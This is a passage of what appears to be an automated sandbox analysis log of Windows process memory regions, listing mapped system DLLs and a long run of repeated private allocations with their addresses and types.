"c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1913 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1914 start_va = 0x6ed00000 end_va = 0x6f898fff monitored = 0 entry_point = 0x6eed6970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 1915 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1916 start_va = 0x71af0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71d2c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1917 start_va = 0x8830000 end_va = 0x8b66fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1918 start_va = 0x860000 end_va = 0x861fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 1919 start_va = 0x6eaf0000 end_va = 0x6ecfefff monitored = 0 entry_point = 0x6eb9b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 1920 start_va = 0x870000 end_va = 0x870fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1921 start_va = 0x8c0000 end_va = 0x8c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1922 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 1923 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1924 start_va = 0x1010000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001010000" filename = "" Region: id = 1925 start_va = 0x1020000 end_va = 0x1024fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 1926 start_va = 0x6c650000 end_va = 0x6c659fff monitored = 0 entry_point = 0x6c653200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1927 start_va = 0x6c610000 end_va = 0x6c642fff monitored = 0 entry_point = 0x6c620e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 1928 start_va = 0x71f20000 end_va = 0x7206afff monitored = 0 entry_point = 0x71f81660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1929 start_va = 0x1020000 end_va = 0x1024fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 1930 start_va = 0x6c660000 end_va = 0x6c699fff monitored = 0 entry_point = 0x6c679be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 1933 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1934 start_va = 0x73b60000 end_va = 0x73c27fff monitored = 0 entry_point = 0x73bcae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 1935 start_va = 0x550000 end_va = 0x553fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1936 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1937 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1938 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1939 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1940 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1941 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1942 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1943 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1944 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1945 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1946 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1947 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1948 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1949 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1950 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1951 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1952 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1953 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1954 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1955 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1956 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1957 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1958 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1959 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1960 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1961 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1962 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1963 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1964 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1965 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1966 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1967 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1968 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1969 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1970 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1971 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1972 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1973 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1974 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1975 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1976 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1977 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1978 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1979 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1980 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1981 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1982 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1983 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1984 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1985 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1986 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1987 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1988 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1989 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2043 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2044 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2056 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2057 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2068 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2069 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2071 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2072 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2076 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2077 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2082 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2083 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2088 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2089 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2090 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2091 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2096 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2097 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2098 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2099 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2100 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2101 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2102 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2103 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2104 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2105 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2106 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2107 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2108 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2109 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2110 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2111 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2112 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2113 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2114 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2115 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2116 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2117 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2118 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2119 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2120 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2121 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2122 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2123 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2124 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2125 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2126 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2127 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2128 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2129 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2130 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2131 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2132 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2133 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2134 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2135 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2136 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2137 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2138 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2139 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2140 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2141 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2142 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2143 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2144 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2145 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2146 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2147 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2148 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2149 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2150 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2151 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2152 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2153 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2154 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2155 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2156 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2157 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2158 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2159 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2160 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2161 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2162 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2163 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2164 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2165 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2166 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2167 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2168 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2169 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2170 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2171 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2172 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2173 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2174 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2175 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2176 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2177 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2178 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2179 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2180 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2181 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2182 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2183 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2184 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2185 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2186 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2187 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2188 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2189 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2190 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2191 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2192 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2193 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2194 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2195 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2196 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2197 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2198 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2199 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = 